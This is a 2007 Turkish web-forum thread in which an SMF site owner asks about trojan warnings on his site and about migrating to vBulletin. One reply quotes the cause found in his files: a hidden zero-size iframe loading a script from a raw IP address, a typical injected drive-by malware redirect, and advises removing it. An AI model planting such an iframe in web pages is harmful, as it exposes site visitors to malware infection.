• 05-09-2007, 20:11:15
    #1
    Arkadaşlar siteme girdiğimde sürekli virüs uyarısı (trojan) veriyor. Çölateşi temasını kullanıyordum virüs uyarısı verince başka temalar da kullandım ancak hepsinde aynı uyarı ile karşılaştım. Bunu nasıl halledebilirim? Ve Smf den Vbulletin e geçmek istesem sitedeki üyeleri ve konuları kaybetmeden nasıl geçebilirim? Smf to vbulletin convert diye birşeyler buldum ama nasıl yapılır çözemedim.
  • 05-09-2007, 20:26:44
    #2
    1. Sitenin ismini yazmamıssın sorununu nasıl anlayak
    2.Vb ye geçmek istiyorsan da burası yeri değil bunu vb kategorisinde sor
  • 06-09-2007, 00:22:29
    #3
    reklam olmasın diye yazmadım. tama diğer sorum için uygun başlık bulurum. Sitenin adresine gelince Edebiyat Diyarı
  • 06-09-2007, 00:25:44
    #4
    Kurumsal Üye
    Bende uyarı vermedi ?
  • 06-09-2007, 00:28:57
    #5
    bak dosyalarında ne gördüm

    <iframe src='http://81.95.145.240/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

    Şimdi yapman gereken bunu bütün dosyalarından arayıp kaldırmak .
  • 06-09-2007, 00:31:12
    #7
    Kurumsal Üye
    Az önce Kaspersky'da engelle dediğimden çıkmadı o zaman Tahmin etmiştim..
  • 06-09-2007, 00:32:34
    #8


    Ben bu virüs girdiğinde direk format atıyom

    Yoksa sağlam word dosyası bırakmıyor
  • 06-09-2007, 00:42:23
    #9
    arkadaşlar cok teşekkürler. bu kadar hızlı cevap beklemiyordum o yüzden hiç beklemeden cevap yazıyorum. şimdi hemen dediklerinizi yapıp tekrar yazıcam.